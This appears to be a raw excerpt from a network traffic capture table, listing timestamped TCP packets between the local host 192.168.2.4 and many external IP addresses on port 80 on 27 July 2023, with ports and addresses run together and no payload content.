                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.881730080 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.881752014 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.881772041 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.881828070 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.881828070 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.881828070 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882142067 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882188082 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882214069 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882236958 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882263899 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882287025 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882335901 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882335901 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882335901 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882858992 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882886887 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882945061 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882945061 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.882987976 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883008003 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883048058 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883074045 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883094072 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883115053 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883136988 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883200884 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883205891 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883205891 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883205891 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883205891 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883224010 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883635998 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883960962 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.883994102 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884028912 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884054899 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884079933 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884141922 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884176970 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884205103 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884244919 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884298086 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884298086 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884298086 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884298086 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884850025 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884881020 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884891033 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884907961 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884929895 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884951115 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884964943 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884965897 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884979963 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.884985924 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885000944 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885020018 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885099888 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885099888 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885099888 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885854006 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885878086 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885902882 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885904074 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885931015 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885957956 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885958910 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885957956 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885977030 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.885987043 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886014938 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886044979 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886056900 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886069059 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886075974 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886097908 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886147022 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886147022 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886766911 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886866093 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886871099 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886894941 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886919975 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886940956 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886960983 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.886981964 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.887001991 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.887008905 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.887008905 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.887008905 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.887022972 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.887037992 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.887042999 CEST8049882172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.887075901 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.887134075 CEST4988280192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.891498089 CEST4989680192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.892039061 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.892061949 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.892134905 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.892169952 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.901349068 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.901385069 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.901590109 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.910602093 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.910645008 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.910684109 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.910721064 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.918313980 CEST8049904135.181.73.98192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.918421984 CEST4990480192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.919738054 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.919785976 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.919970036 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.929080009 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.929121971 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.929272890 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.929297924 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.982482910 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.982516050 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.982687950 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.987032890 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.987063885 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.987226963 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.987273932 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.995467901 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.995497942 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.995668888 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.003535986 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.003568888 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.005666018 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.011609077 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.011639118 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.011902094 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.019473076 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.019509077 CEST804989374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.021174908 CEST4989380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.037216902 CEST8049900162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.038204908 CEST4990580192.168.2.4210.140.73.39
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.038562059 CEST8049900162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.038626909 CEST4990080192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.080598116 CEST804989260.43.154.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.080713034 CEST4989280192.168.2.460.43.154.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.172137976 CEST8049896202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.172255039 CEST4989680192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.322222948 CEST4990080192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.459162951 CEST8049846188.166.152.188192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.459326982 CEST4984680192.168.2.4188.166.152.188
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.491636038 CEST804989982.201.61.230192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.491770983 CEST4989980192.168.2.482.201.61.230
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.507488966 CEST4990680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.562272072 CEST4990780192.168.2.481.2.194.241
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.595175982 CEST804990693.187.206.66192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.595298052 CEST4990680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.595967054 CEST4990680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.596498013 CEST804990781.2.194.241192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.597135067 CEST4990780192.168.2.481.2.194.241
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.607372046 CEST8049900162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.608508110 CEST8049900162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.608757019 CEST4990080192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.635560989 CEST4990780192.168.2.481.2.194.241
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.669840097 CEST804990781.2.194.241192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.674664974 CEST804990781.2.194.241192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.674777985 CEST4990780192.168.2.481.2.194.241
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.683607101 CEST804990693.187.206.66192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.683696032 CEST804990693.187.206.66192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.683825970 CEST4990680192.168.2.493.187.206.66
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.700005054 CEST4990780192.168.2.481.2.194.241
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.739628077 CEST804990781.2.194.241192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.741269112 CEST4990780192.168.2.481.2.194.241
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.749313116 CEST4990880192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.756968975 CEST4990980192.168.2.446.242.238.60
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.765963078 CEST4991080192.168.2.434.117.168.233
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.769743919 CEST4991180192.168.2.439.99.233.155
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.780174017 CEST804991034.117.168.233192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.780313969 CEST4991080192.168.2.434.117.168.233
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.787399054 CEST804990946.242.238.60192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.787523031 CEST4990980192.168.2.446.242.238.60
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.872864962 CEST8049908108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.873048067 CEST4990880192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.916462898 CEST4991080192.168.2.434.117.168.233
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.916546106 CEST4990980192.168.2.446.242.238.60
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.917217016 CEST4990880192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.917675972 CEST4991280192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.917866945 CEST4991380192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.930581093 CEST804991034.117.168.233192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.932007074 CEST4991480192.168.2.496.91.204.114
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.943044901 CEST804991034.117.168.233192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.943216085 CEST4991080192.168.2.434.117.168.233
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.946798086 CEST804990946.242.238.60192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.947897911 CEST804990946.242.238.60192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.948007107 CEST4990980192.168.2.446.242.238.60
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.040527105 CEST8049908108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.046919107 CEST8049908108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.046998024 CEST4990880192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.057373047 CEST804991252.71.57.184192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.057544947 CEST4991280192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.082356930 CEST804991369.163.239.62192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.082508087 CEST4991380192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.134397984 CEST4991280192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.135252953 CEST4991380192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.135426998 CEST4990880192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.176023006 CEST80498483.65.101.129192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.176162958 CEST4984880192.168.2.43.65.101.129
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.184688091 CEST4991580192.168.2.496.127.180.42
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.185059071 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.201351881 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.201523066 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.202037096 CEST4991680192.168.2.4104.21.66.46
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.218276024 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.221353054 CEST4991780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.237649918 CEST8049917188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.237761021 CEST4991780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.238145113 CEST4991780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.254328966 CEST8049917188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.266365051 CEST8049908108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.266499996 CEST4990880192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.266765118 CEST8049917188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.266844988 CEST4991780192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.273502111 CEST804991252.71.57.184192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.273533106 CEST804991252.71.57.184192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.273636103 CEST4991280192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.273710012 CEST4991280192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.299951077 CEST804991369.163.239.62192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.300334930 CEST804991369.163.239.62192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.300533056 CEST4991380192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.353538990 CEST4991280192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.434402943 CEST4991880192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.465359926 CEST4991380192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.492639065 CEST804991252.71.57.184192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.493030071 CEST804986080.93.82.33192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.493227005 CEST4986080192.168.2.480.93.82.33
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.554970026 CEST4991980192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.555860996 CEST4992080192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.572283030 CEST8049920188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.572432041 CEST4992080192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.573858976 CEST4992080192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.574351072 CEST804991852.71.57.184192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.574486017 CEST4991880192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.575160027 CEST4991880192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.587389946 CEST804991977.68.50.105192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.590178967 CEST8049920188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.590708971 CEST4991980192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.591099977 CEST4991980192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.623709917 CEST804991977.68.50.105192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.623770952 CEST804991977.68.50.105192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.624084949 CEST4991980192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.629949093 CEST804991369.163.239.62192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.630287886 CEST804991369.163.239.62192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.630425930 CEST4991380192.168.2.469.163.239.62
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.714479923 CEST804991852.71.57.184192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.714509964 CEST804991852.71.57.184192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.714773893 CEST4991980192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.714948893 CEST4991880192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.722003937 CEST804985459.106.19.204192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.724647045 CEST4991880192.168.2.452.71.57.184
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.725830078 CEST4985480192.168.2.459.106.19.204
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.740535021 CEST804990781.2.194.241192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.740606070 CEST4990780192.168.2.481.2.194.241
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.747145891 CEST804991977.68.50.105192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.747173071 CEST804991977.68.50.105192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.747277975 CEST4991980192.168.2.477.68.50.105
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.752825022 CEST804985270.39.251.249192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.752970934 CEST4985280192.168.2.470.39.251.249
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770617962 CEST8049916104.21.66.46192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.770669937 CEST8049916104.21.66.46192.168.2.4
